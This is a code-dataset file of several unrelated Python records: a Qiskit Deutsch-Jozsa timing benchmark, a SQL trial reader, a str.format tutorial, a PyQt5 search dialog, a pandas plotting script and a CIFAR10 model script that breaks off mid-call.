optimization_level=optimization_level)\r\n\t\t\t\t\tend = time.time()\r\n\t\t\t\t\tjob = execute(circuit, backend, optimization_level=0, shots=1)\r\n\t\t\t\t\tdelayed_result = backend.retrieve_job(job.job_id()).result()\r\n\r\n\t\t\t\t\tqc_transpile_times[optimization_level].append(end - start)\r\n\t\t\t\t\tqc_run_times[optimization_level].append(job.result().time_taken)\r\n\t\t\t\t\tqc_gates[optimization_level].append(circuit.size())\r\n\r\n #for graphing, adjust array of qubit values to include the helper qubit\r\n\t\tfor i in range(len(qubits)):\r\n\t\t\tqubits[i] += 1\r\n\r\n\t\tfor optimization_level in range(4):\r\n\t\t\tfig, ax1 = plt.subplots()\r\n\t\t\tln11 = ax1.plot(qubits, sim_transpile_times[optimization_level], 'r', label=\"QASM simulator\")\r\n\t\t\tln12 = ax1.plot(qubits, qc_transpile_times[optimization_level], 'k', label=backend.name())\r\n\t\t\tax1.set_xlabel('Number of Qubits')\r\n\t\t\tax1.set_ylabel('Transpile time (sec)')\r\n\r\n\t\t\tax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\t\t\tax2.set_ylabel('Number of gates') # we already handled the x-label with ax1\r\n\t\t\tln21 = ax2.plot(qubits, sim_gates[optimization_level], 'b', label='QASM simulator')\r\n\t\t\tln22 = ax2.plot(qubits, qc_gates[optimization_level], 'g', label=backend.name())\r\n\r\n\t\t\tfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n\t\t\tplt.legend(ln11 + ln12 + ln21 + ln22, ['QASM simulator transpile', backend.name() + ' transpile', 'QASM simulator #g', backend.name() + ' #g'], loc=0)\r\n\t\t\tplt.subplots_adjust(top=0.88)\r\n\r\n\t\t\tplt.suptitle('Transpile time scalability of Deutsch-Jozsa on %s\\n(optimization level = %d)' % (func_in_name, optimization_level))\r\n\t\t\tplt.savefig('deutsch_jozsa_transpile_scalability_%s_%dopt_{:%Y-%m-%d_%H-%M-%S}.png'.format(datetime.datetime.now()) % (func_in_name, optimization_level), fontsize=8)\r\n\r\n\t\t\t# ==========\r\n\r\n\t\t\tfig, ax1 = plt.subplots()\r\n\t\t\tln11 = ax1.plot(qubits, sim_run_times[optimization_level], 'r', label=\"QASM simulator\")\r\n\t\t\tln12 = ax1.plot(qubits, qc_run_times[optimization_level], 'k', label=backend.name())\r\n\t\t\tax1.set_xlabel('Number of Qubits')\r\n\t\t\tax1.set_ylabel('Run time (sec)')\r\n\r\n\t\t\tax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\t\t\tax2.set_ylabel('Number of gates') # we already handled the x-label with ax1\r\n\t\t\tln21 = ax2.plot(qubits, sim_gates[optimization_level], 
'b', label='QASM simulator')\r\n\t\t\tln22 = ax2.plot(qubits, qc_gates[optimization_level], 'g', label=backend.name())\r\n\r\n\t\t\tfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n\t\t\tplt.legend(ln11 + ln12 + ln21 + ln22, ['QASM simulator run', backend.name() + ' run', 'QASM simulator #g', backend.name() + ' #g'], loc=0)\r\n\t\t\tplt.subplots_adjust(top=0.88)\r\n\r\n\t\t\tplt.suptitle('Run time scalability of Deutsch-Jozsa on %s\\n(optimization level = %d)' % (func_in_name, optimization_level))\r\n\t\t\tplt.savefig('deutsch_jozsa_run_scalability_%s_%dopt_{:%Y-%m-%d_%H-%M-%S}.png'.format(datetime.datetime.now()) % (func_in_name, optimization_level), fontsize=8)\t\r\n\r\n\t\tfig, ax1 = plt.subplots()\r\n\t\tax1.set_xlabel('Qiskit optimization level')\r\n\t\tax1.set_ylabel('Transpile time (sec)')\r\n\t\tln11 = ax1.plot(range(4), [sim_transpile_times[i][-1] for i in range(4)], 'r', label='QASM simulator transpile')\r\n\t\tln12 = ax1.plot(range(4), [qc_transpile_times[i][-1] for i in range(4)], 'k', label=backend.name() + ' transpile')\r\n\r\n\t\tax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\t\tax2.set_ylabel('Run time (sec)') # we already handled the x-label with ax1\r\n\t\tln21 = ax2.plot(range(4), [sim_run_times[i][-1] for i in range(4)], 'b', label='QASM simulator run')\r\n\t\tln22 = ax2.plot(range(4), [qc_run_times[i][-1] for i in range(4)], 'g', label=backend.name() + ' run')\r\n\r\n\t\tfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n\t\tplt.legend(ln11 + ln12 + ln21 + ln22, ['QASM simulator transpile', backend.name() + ' transpile', 'QASM simulator run', backend.name() + ' run'], loc=0)\r\n\t\tplt.subplots_adjust(top=0.88)\r\n\t\tplt.suptitle('Comparison of transpile and run times for Deutsch_Jozsa on %s\\n(%d qubits)' % (func_in_name, qubits[-1]))\r\n\t\tplt.savefig('deutsch_jozsa_run_transpile_comp_%s_{:%Y-%m-%d_%H-%M-%S}.png'.format(datetime.datetime.now()) % func_in_name, fontsize=8)\t\r\n","sub_path":"Qiskit-IBMQX/deutsch_jozsa.py","file_name":"deutsch_jozsa.py","file_ext":"py","file_size_in_byte":12588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"191831139","text":"from trialsfactory import TrialsFactory\nfrom utils.ConnectionUtils import DATABASE_PARAM, TABLE_PARAM, \\\n SQL_FOR_SELECTION, get_connection, COUNTER_START, \\\n TRIAL_PARAM, COUNTER_STEP, CLASS_PARAM, ACCOUNT_PARAM, \\\n MARK1_PARAM, MARK2_PARAM, MARK3_PARAM, SQL_PARAMS_NUMBER, is_table_exist\nfrom utils.ExceptionHandling import get_logger_, \\\n NOT_ENOUGH_PARAMETERS_SQL, TABLE_DOES_NOT_EXIST\nfrom utils.ReaderWriterConstants import DOT, READER_CONSTANT, \\\n CONFIG_CONSTANT\nfrom utils.TrialConstants import FINAL_TRIAL\n\n\nclass SqlTrialReader:\n logger = get_logger_()\n\n def __init__(self, *args):\n reader = args[READER_CONSTANT]\n configuration_file_name = args[CONFIG_CONSTANT]\n params = reader.split(DOT)\n if len(params) < SQL_PARAMS_NUMBER:\n raise ValueError(NOT_ENOUGH_PARAMETERS_SQL + reader)\n database_name = params[DATABASE_PARAM]\n table_name = params[TABLE_PARAM]\n if is_table_exist(configuration_file_name, database_name, table_name):\n self.SQL = SQL_FOR_SELECTION.format(table_name)\n self.counter = COUNTER_START\n self.connection = get_connection(configuration_file_name, database_name)\n self.cursor = self.connection.cursor(prepared=True)\n else:\n raise ValueError(TABLE_DOES_NOT_EXIST.format(database_name, table_name))\n\n def next_trial(self):\n 
self.cursor.execute(self.SQL, (str(self.counter),))\n        trial = self.cursor.fetchall()\n        if len(trial) > TRIAL_PARAM:\n            self.counter += COUNTER_STEP\n            return TrialsFactory.get_trial(trial[TRIAL_PARAM][CLASS_PARAM],\n                                           trial[TRIAL_PARAM][ACCOUNT_PARAM],\n                                           trial[TRIAL_PARAM][MARK1_PARAM],\n                                           trial[TRIAL_PARAM][MARK2_PARAM],\n                                           trial[TRIAL_PARAM][MARK3_PARAM])\n        else:\n            return FINAL_TRIAL\n\n    def close(self):\n        self.connection.close()\n","sub_path":"threads2/readers/SqlTrialReader.py","file_name":"SqlTrialReader.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"485532518","text":"# Basic format() operations\r\nprint(\"{}语言是世界上最{}的语言\".format(\"python\",\"好\"))\r\n# Escaping braces in a format string\r\nprint(\"{{{{python}}语言是{}最{}的语言}}\".format(\"世界上\",\"好\"))\r\n# {field!conversion}\r\na=\"{0!a}\".format(\"战狼2\")\r\nprint(a)\r\n# {field:format_spec}\r\na=\"{0:a>30,.2f}\".format(1234567.7654321)\r\nprint(a)\r\n# {field!conversion:format_spec}\r\na=\"{0!a:>30}\".format('战狼2')\r\nprint(a)\r\n\r\n# 1. Field names\r\n# Field names can be bound by keyword\r\na=\"{who}今年{age}岁了\".format(who=\"妈妈\",age=76)\r\nprint(a)\r\n# Positional and keyword fields can also be mixed\r\na=\"{who}今年{}岁了\".format(76,who=\"妈妈\")\r\nprint(a)\r\n\r\n# Key point: field names can index container types such as lists and dicts\r\nfamilylist=[\"妈妈\",76]\r\na=\"{0[0]}今年{0[1]}岁了\".format(familylist)\r\nprint(a)\r\n\r\nfamilydict=dict(who=\"妈妈\",age=76)\r\na=\"{0[who]}今年{0[age]}岁了\".format(familydict)\r\nprint(a)\r\n\r\n# In IDLE, compare the repr form with the printed form\r\nimport decimal\r\n# repr form\r\ndecimal.Decimal(\"3.14159265\")\r\n# printed form\r\nprint(decimal.Decimal(\"3.14159265\"))\r\n# Different conversions do not necessarily produce the same output\r\nimport decimal\r\n\"{0}-{0!s}-{0!r}-{0!a}\".format(decimal.Decimal(\"3.14159265\"))\r\n\r\n# String formatting\r\ns=\"字符串格式化\"\r\n# Default formatting\r\n\"{0}\".format(s)\r\n# Minimum width 30, right-aligned\r\n\"{0:>30}\".format(s)\r\n# Minimum width 30, centered\r\n\"{0:^30}\".format(s)\r\n# Minimum width 30, centered, padded with - instead of spaces\r\n\"{0:-^30}\".format(s)\r\n# Minimum width 30, left-aligned, padded with .\r\n\"{0:.<30}\".format(s)\r\n# Maximum width 5\r\n\"{0:.5}\".format(s)\r\n# >>> print(len(\"{0:.5}\".format(s)))\r\n# >>> 5\r\n\r\n# Fill examples\r\n# Fill with 0, minimum width 12\r\n\"{0:0=12}\".format(1234567)\r\n# Fill with a, minimum width 12\r\n\"{0:a=12}\".format(1234567)\r\n# Fill with *, minimum width 12\r\n\"{0:*=12}\".format(1234567)\r\n\r\n# Alignment examples\r\n# Fill with *, minimum width 15, left-aligned\r\n\"{0:*<15}\".format(1234567)\r\n# Fill with *, minimum width 15, centered\r\n\"{0:*^15}\".format(1234567)\r\n# Fill with *, minimum width 15, centered, negative number\r\n\"{0:*^15}\".format(-1234567)#! the minus sign takes up one character\r\n# Fill with *, minimum width 15, right-aligned\r\n\"{0:*>15}\".format(1234567)\r\n\r\n\r\n# Sign character examples\r\n# Positive numbers unchanged, negative numbers get -\r\n\"[{0:}][{1:}]\".format(1234567,-1234567)\r\n# Positive numbers get a space, negative numbers get -\r\n\"[{0: }][{1: }]\".format(1234567,-1234567)\r\n# Positive numbers get +, negative numbers get - <sign is forced>\r\n\"[{0:+}][{1:+}]\".format(1234567,-1234567)\r\n# Output is the same as the first variant\r\n\"[{0:-}][{1:-}]\".format(1234567,-1234567)\r\n\r\n# Type character examples\r\n\"[{0:#b}] [{0:#o}] [{0:#x}] [{0:#X}]\".format(12345678)\r\n# Binary, octal, lowercase hex and uppercase hex respectively\r\n\r\n# Key point: digit grouping with the , option\r\n\"[{0:,}] [{0:*>13,}]\".format(123456789)\r\n\r\n# Exponent form vs. fixed-point form\r\n# Minimum width 12, two decimal places <first in e notation, second fixed-point>\r\n\"[{0:12.2e}] [{0:12.2f}]\".format(123.456)\r\n# Minimum width 12, 2 decimal places, first in e notation, padded with *\r\n\"[{0:*>12.2e}] [{0:*>12.2f}]\".format(1234.4321)\r\n# Minimum width 12, 2 decimal places, first in e notation, padded with *, sign forced\r\n\"[{0:*>+12.2e}] [{0:*>+12.2f}]\".format(1234.4321)\r\n\r\n# The format() built-in (delegates to __format__)\r\nformat(75.2222,\".2f\")\r\n\r\n# Date/time special case (datetime module)\r\nfrom datetime import datetime\r\n\"{:%Y-%m-%d %H:%M}\".format(datetime(2018,2,3,4,5))\r\n# Prints: '2018-02-03 04:05'\r\n\r\n# On the problem of aligning Chinese characters\r\n\"\"\"\r\nFor %-formatting a Chinese character counts as a single character, but in\r\nmost font designs the width of one Chinese character is not exactly the\r\nwidth of two English characters, so the printed columns look uneven.\r\n\"\"\"\r\nc=[\r\n\"山\",\r\n\"山\"\"山\",\r\n\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\"\"山\"\"山\",\r\n]\r\nprint(\"-----Plain string formatting------\")\r\nfor x in range(len(c)):\r\n    print(\"|%20s|\"%c[x])\r\n'''\r\nThe printed result is ragged:\r\n|                   山|\r\n|                  山山|\r\n|                 山山山|\r\n|                山山山山|\r\n|               山山山山山|\r\n|              山山山山山山|\r\n|             山山山山山山山|\r\n'''\r\n\r\n\r\n# In a monospaced font, however, one Chinese character is exactly as wide as two English characters.\r\n# We can use that to compute the display width of a string automatically.\r\n\r\nc=[\r\n\"山\",\r\n\"山\"\"山\",\r\n\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\"\"山\",\r\n\"山\"\"山\"\"山\"\"山\"\"山\"\"山\"\"山\"\r\n]\r\n# Custom helper that counts wide (non-ASCII) characters\r\ndef chinese(data):\r\n    count=0\r\n    for s in data:\r\n        if ord(s)>127:\r\n            count+=1\r\n    return count\r\n\r\nprint(\"-----Formatting with the computed width------\")\r\nfor x in range(len(c)):\r\n    number=chinese(c[x])\r\n    newStr='{0:{wd}}'.format(c[x],wd=20-number)\r\n    print('|%s|'%newStr)\r\n","sub_path":"study_format.py","file_name":"study_format.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"350479831","text":"# Betty > dialogs > search.py\n\nfrom PyQt5.QtGui import (QTextDocument,\n                         QTextCharFormat,\n                         QIcon)\n\nfrom PyQt5.QtCore import (QDate,\n                          QStringListModel,\n                          Qt,\n                          QSettings,\n                          QSize,\n                          QPoint)\n\nfrom PyQt5.QtWidgets import (QLabel,\n                             QLineEdit,\n                             QPushButton,\n                             QComboBox,\n                             QCheckBox,\n                             QDateEdit,\n                             QTextEdit,\n                             QSpinBox,\n                             QGridLayout,\n                             QDialog,\n                             QHBoxLayout,\n                             QVBoxLayout,\n                             QGroupBox,\n                             QCalendarWidget,\n                             QCompleter)\n\nfrom resources.constants import (SEARCH_SPECIAL,\n                                 SEARCH_TEMPLATE,\n                                 ARTWORK_TOOLTIP,\n                                 IMAGE_TOOLTIP,\n                                 WITH_ARTWORK,\n                                 WITH_IMAGE,\n                                 GOOGLE_DEFAULT,\n                                 GOOGLE_TAT,\n                                 ABBOTT_TAT,\n                                 UN_TAT,\n                                 GE_TAT,\n                                 STYLE)\n\n\n# Main dialog for searching template\nclass Search(QDialog):\n\n    def __init__(self, parent=None):\n        super(Search, self).__init__(parent)\n\n        # resident variables\n        self.date_format = 'd MMM yyyy'\n        self.due_date = QDate.currentDate()\n        self.today = QDate.currentDate()\n        self.selected_TAT = ''\n        self.artwork = ''\n        self.image = ''\n        self.special_ins = ''\n        self.client_TAT = ''\n        self.DEFAULT_SI = ''\n\n        # TEST: trying to implement QCompleter here\n        self.suggested_markers_model = QStringListModel()\n        self.suggested_markers_model.setStringList([\"bapples\", \"banana\", \"apple\", \"orange\", \"amazing\"])\n        self.tracker_completer = QCompleter()\n        self.tracker_completer.setModel(self.suggested_markers_model)\n        self.tracker_completer.setCaseSensitivity(Qt.CaseInsensitive)\n\n        # resident functions\n        self._widgets()\n        self._layout()\n        self._properties()\n        self._connections()\n        self._readSettings()  # read current state of this dialog\n\n    def _widgets(self):\n        \"\"\" Create new PyQt widgets here \"\"\"\n\n        self.trackerLineEdit = QLineEdit()\n        self.clientLabel = QLabel(\"Client:\")\n        self.clientComboBox = QComboBox()\n        # TODO: you need a freaking list to hold your growing clients :)\n        self.clientComboBox.insertItem(0, \"Abbott\")\n        self.clientComboBox.insertItem(1, \"GE\")\n        self.clientComboBox.insertItem(2, \"Google\")\n        self.clientComboBox.insertItem(3, \"Unilever\")\n        self.clientComboBox.setCurrentText(\"Unilever\")\n        self.due_dateLabel = QLabel(\"Due Date:\")\n        self.importanceLabel = QLabel(\"Select Importance:\")\n        self.special_instructionLabel = QLabel(\"Special Instruction:\")\n        self.due_dateDateEdit =
QDateEdit(QDate.currentDate()) # initialize by current date\n self.defaultCalendar = QCalendarWidget()\n self.currentDateFormat = QTextCharFormat()\n self.currentDateFormat.setFontWeight(75)\n self.daysSpinBox = QSpinBox()\n self.importanceComboBox = QComboBox() # provide a list when using this widget for it's content\n self.importanceComboBox.insertItem(0, \"Low/Medium\")\n self.importanceComboBox.insertItem(1, \"Critical\")\n self.importanceComboBox.setCurrentIndex(0)\n self.with_artworkCheckBox = QCheckBox(\"With Artwork\")\n self.with_imageCheckBox = QCheckBox(\"With Image\")\n self.special_instructionLineEdit = QLineEdit()\n self.previewLabel = QLabel(\"Preview:\")\n self.previewTextEdit = QTextEdit()\n self.previewButton = QPushButton(\"Pr&eview\")\n self.addButton = QPushButton(\"&Add\")\n self.addButton.setEnabled(False)\n self.clearButton = QPushButton(\"&Clear\")\n\n def _layout(self):\n \"\"\" Set and arrange PyQt widgets here \"\"\"\n\n # clientLabel + clientComboBox\n label_combobox_HBoxLayout = QHBoxLayout()\n label_combobox_HBoxLayout.addWidget(self.trackerLineEdit)\n label_combobox_HBoxLayout.addStretch()\n label_combobox_HBoxLayout.addWidget(self.clientLabel)\n label_combobox_HBoxLayout.addWidget(self.clientComboBox)\n\n label_dateEdit_tandem = QHBoxLayout()\n label_dateEdit_tandem.addWidget(self.due_dateLabel)\n label_dateEdit_tandem.addWidget(self.due_dateDateEdit)\n label_dateEdit_tandem.addWidget(self.daysSpinBox)\n\n label_comboBox_tandem = QHBoxLayout()\n label_comboBox_tandem.addWidget(self.importanceLabel)\n label_comboBox_tandem.addWidget(self.importanceComboBox)\n\n grid = QGridLayout() # widget ka pala\n grid.addLayout(label_dateEdit_tandem, 0, 0) # affected\n grid.addWidget(self.with_artworkCheckBox, 0, 2)\n grid.addLayout(label_comboBox_tandem, 1, 0) # affected\n grid.addWidget(self.with_imageCheckBox, 1, 2)\n grid.addWidget(self.special_instructionLabel, 2, 0)\n grid.addWidget(self.special_instructionLineEdit, 3, 0, 1, 3)\n\n input_fieldsGroupBox = QGroupBox(\"Set Criteria\")\n input_fieldsGroupBox.setLayout(grid)\n\n # Arrange vertically\n center = QVBoxLayout()\n center.addLayout(label_combobox_HBoxLayout)\n center.addWidget(input_fieldsGroupBox)\n center.addWidget(self.previewLabel)\n center.addWidget(self.previewTextEdit)\n\n # Layout buttons\n buttons = QHBoxLayout()\n buttons.addStretch()\n buttons.addWidget(self.previewButton)\n buttons.addWidget(self.addButton)\n buttons.addWidget(self.clearButton)\n\n # add layout to the group\n center.addLayout(buttons)\n\n # set main layout for Search\n self.setLayout(center)\n\n def _properties(self):\n \"\"\" Set properties of PyQt widgets here \"\"\"\n\n self.trackerLineEdit.setPlaceholderText(\"Marker\")\n self.trackerLineEdit.setFrame(False)\n self.trackerLineEdit.setCompleter(self.tracker_completer)\n self.due_dateDateEdit.setDisplayFormat(self.date_format) # ex. 
14 Mar 2015\n self.due_dateDateEdit.setCalendarPopup(True)\n self.due_dateDateEdit.setCalendarWidget(self.defaultCalendar)\n self.defaultCalendar.setGridVisible(True)\n self.defaultCalendar.setDateTextFormat(QDate.currentDate(), self.currentDateFormat)\n self.special_instructionLineEdit.setPlaceholderText(\"Read correspondence for further instructions\")\n self.with_artworkCheckBox.setToolTip(ARTWORK_TOOLTIP)\n self.with_imageCheckBox.setToolTip(IMAGE_TOOLTIP)\n # You need this to style self.previewTextEdit\n style_document = QTextDocument()\n style_document.setDefaultStyleSheet(STYLE)\n # Apply style\n self.previewTextEdit.setDocument(style_document)\n #self.setAttribute(Qt.WA_DeleteOnClose)\n #self.setWindowModality(Qt.NonModal)\n\n # set default TAT values\n self.client_TAT = UN_TAT\n\n # TEST: see line 37\n self.selected_TAT = UN_TAT['Low/Medium'] # set default\n\n # For the main window\n self.setWindowTitle(\"Search (SIW) Template Form\")\n self.setWindowIcon(QIcon(':/magnify_32.png'))\n\n def _readSettings(self):\n\n settings = QSettings(\"SEARCHING\", \"search_dialog\")\n position = settings.value(\"position\", QPoint(200, 200))\n size = settings.value(\"size\", QSize(410, 550))\n self.move(position)\n self.resize(size)\n\n def _writeSettings(self):\n\n settings = QSettings(\"SEARCHING\", \"search_dialog\")\n settings.setValue(\"position\", self.pos())\n settings.setValue(\"size\", self.size())\n\n def _connections(self):\n \"\"\" Connect every PyQt widgets here \"\"\"\n\n self.clientComboBox.activated.connect(self.on_clientComboBox_activated)\n self.due_dateDateEdit.dateChanged.connect(self.on_due_dateDateEdit_dateChanged)\n self.daysSpinBox.valueChanged.connect(self.on_daysSpinBox_valueChanged)\n self.importanceComboBox.activated.connect(self.on_importanceComboBox_activated)\n self.with_artworkCheckBox.stateChanged.connect(self.on_with_artworkCheckBox_stateChanged)\n self.with_imageCheckBox.stateChanged.connect(self.on_with_imageCheckBox_stateChanged)\n self.previewButton.clicked.connect(self.on_previewButton_clicked)\n # The generate button will only retrieve and throw data based on the input widgets\n self.addButton.clicked.connect(self.accept)\n self.clearButton.clicked.connect(self.on_clearButton_clicked)\n\n # TEST: event handling for self.dueDateEdit.dateChanged\n def on_due_dateDateEdit_dateChanged(self):\n \"\"\" Event handler for self.due_dateDateEdit\n\n return QDate\n \"\"\"\n\n # Get any selected date when the user uses the calendar\n self.due_date = self.due_dateDateEdit.date()\n return self.due_date\n\n def dialog_info(self):\n \"\"\" Dialog information identifier \"\"\"\n\n return 'Searching'\n\n # EVENT HANDLING starts here...\n def on_clientComboBox_activated(self):\n \"\"\" Event handler for self.clientComboBox \"\"\"\n\n # TODO: Ok, you see a pattern here. 
You know what to do with this un-pythonic block of conditions!\n if self.clientComboBox.currentText() == 'GE':\n self.DEFAULT_SI = \"\"\n self.client_TAT = GE_TAT\n self.selected_TAT = GE_TAT[self.importanceComboBox.currentText()]\n elif self.clientComboBox.currentText() == 'Google':\n self.DEFAULT_SI = GOOGLE_DEFAULT\n self.client_TAT = GOOGLE_TAT\n self.selected_TAT = GOOGLE_TAT[self.importanceComboBox.currentText()]\n elif self.clientComboBox.currentText() == 'Unilever':\n self.DEFAULT_SI = \"\"\n self.client_TAT = UN_TAT\n self.selected_TAT = UN_TAT[self.importanceComboBox.currentText()]\n elif self.clientComboBox.currentText() == 'Abbott':\n self.DEFAULT_SI = \"\"\n self.client_TAT = ABBOTT_TAT\n self.selected_TAT = ABBOTT_TAT[self.importanceComboBox.currentText()]\n else:\n pass\n\n def on_importanceComboBox_activated(self):\n \"\"\" Event handler for self.importanceComboBox \"\"\"\n\n # Get selected importance\n importance = self.importanceComboBox.currentText()\n\n # Check what the user choose\n if importance == 'Low/Medium':\n self.selected_TAT = self.client_TAT[importance]\n elif importance == 'Critical':\n self.selected_TAT = self.client_TAT[importance]\n else:\n print('BET: unsual - no importance selected?')\n\n def on_with_artworkCheckBox_stateChanged(self):\n \"\"\" Event handler for self.with_artworkCheckBox \"\"\"\n\n if self.with_artworkCheckBox.isChecked():\n self.artwork = WITH_ARTWORK\n else:\n self.artwork = ''\n\n def on_with_imageCheckBox_stateChanged(self):\n \"\"\" Event handler for with_imageCheckBox \"\"\"\n\n if self.with_imageCheckBox.isChecked():\n self.image = WITH_IMAGE\n else:\n self.image = ''\n\n def on_daysSpinBox_valueChanged(self):\n\n self.due_date = self.today.addDays(self.daysSpinBox.value())\n\n def on_previewButton_clicked(self):\n \"\"\" Preview the user's input inside the self.previewTextEdit \"\"\"\n\n # Check if special_instructionLineEdit has content\n if self.special_instructionLineEdit.text():\n self.special_ins = SEARCH_SPECIAL.format(self.special_instructionLineEdit.text())\n else:\n self.special_ins = ''\n\n # Consolidate anything :)\n self.html = SEARCH_TEMPLATE.substitute(default=self.DEFAULT_SI,\n special=self.special_ins,\n artwork=self.artwork,\n TAT=self.selected_TAT.format(self.due_date.toString(self.date_format)),\n image=self.image)\n\n # Show output\n self.previewTextEdit.setHtml(self.html.strip())\n\n # Enable self.addButton\n self.addButton.setEnabled(True)\n\n def on_clearButton_clicked(self):\n \"\"\" Event handler for clearing text inside self.special_instructionLineEdit and self.previewTextEdit \"\"\"\n\n self.special_instructionLineEdit.clear()\n self.previewTextEdit.clear()\n\n # OVERRIDING: starts here\n def accept(self):\n\n self._writeSettings()\n self.done(1)\n\n def keyPressEvent(self, event):\n\n if event.key() == Qt.Key_Escape:\n self._writeSettings()\n self.close()\n\n def closeEvent(self, event):\n\n self._writeSettings()\n","sub_path":"src/dialogs/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":13213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"301710329","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv(\"dataset.csv\")\ndel df[\"Date\"]\n\ncolors = [\"green\", \"red\", \"blue\", \"orange\", \"purple\", \"black\", \"yellow\", \"brown\"]\ncounter = 0\nfor i in df.columns[1:]:\n plt.figure(figsize=(20, 5))\n plt.plot(df[\"Calories\"].sort_values(), df[i].sort_values(), color = colors[counter])\n 
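# Note: calling .sort_values() on each column independently pairs the k-th\n    # smallest Calories value with the k-th smallest value of column i, which\n    # breaks the row-wise pairing of the data. To plot true (x, y) pairs\n    # ordered by Calories, one option would be:\n    #   ordered = df.sort_values(\"Calories\")\n    #   plt.plot(ordered[\"Calories\"], ordered[i], color=colors[counter])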
plt.title(i)\n plt.ylabel(i)\n plt.xlabel(\"Calories\")\n plt.show()\n counter+=1\n","sub_path":"aashna/multipleGraphs.py","file_name":"multipleGraphs.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"6501539","text":"import torch\r\nimport torch.nn as nn\r\nimport numpy as np\r\nimport random\r\nimport pickle\r\nfrom torchvision import datasets\r\nfrom torchvision import transforms\r\nimport torch.nn.functional as F\r\nfrom sklearn.decomposition import PCA\r\n\r\n\r\nclass CIFAR10(nn.Module):\r\n def __init__(self):\r\n super(CIFAR10, self).__init__()\r\n self.features = nn.Sequential(\r\n nn.Conv2d(3, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False),\r\n nn.Conv2d(64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False),\r\n nn.Conv2d(128, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False),\r\n nn.Conv2d(256, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False),\r\n nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False))\r\n\r\n self.avgpool = nn.AdaptiveAvgPool2d((7, 7))\r\n\r\n self.classifier_1 = nn.Linear(in_features=25088, out_features=4096, bias=True)\r\n self.classifier_2 = nn.Linear(in_features=4096, out_features=4096, bias=True)\r\n self.classifier_3 = nn.Linear(in_features=4096, out_features=10, bias=True)\r\n\r\n def forward(self, x):\r\n x = self.features(x)\r\n x = self.avgpool(x)\r\n x = torch.flatten(x, 1)\r\n\r\n x = self.classifier_1(x)\r\n x = F.relu(x, inplace=True)\r\n x = F.dropout(x, p=0.5, inplace=False)\r\n x = self.classifier_2(x)\r\n x = F.relu(x, inplace=True)\r\n x = F.dropout(x, p=0.5, inplace=False)\r\n x = self.classifier_3(x)\r\n return x\r\n\r\n def get_embedding(self, x):\r\n x = self.features(x)\r\n x = self.avgpool(x)\r\n x = torch.flatten(x, 1)\r\n\r\n x = self.classifier_1(x)\r\n x = F.relu(x, inplace=True)\r\n x = F.dropout(x, p=0.5, inplace=False)\r\n x = self.classifier_2(x)\r\n return x\r\n\r\n\r\ndef setup_seed(seed):\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed_all(seed)\r\n np.random.seed(seed)\r\n random.seed(seed)\r\n torch.backends.cudnn.deterministic = True\r\n\r\n\r\nsetup_seed(24)\r\n\r\nmodel = torch.load('/home/tdye/EMD/model.pt').cuda()\r\n\r\ntransform = transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.5, 0.5, 0.5],\r\n std=[0.5, 0.5, 0.5])\r\n])\r\n\r\ntrain_data = datasets.CIFAR10(root='./data/', train=True, transform=transform, download=True)\r\ntest_data = datasets.CIFAR10(root='./data/', train=False, transform=transform, download=True)\r\ntrain_loader = torch.utils.data.DataLoader(\r\n dataset=train_data, 
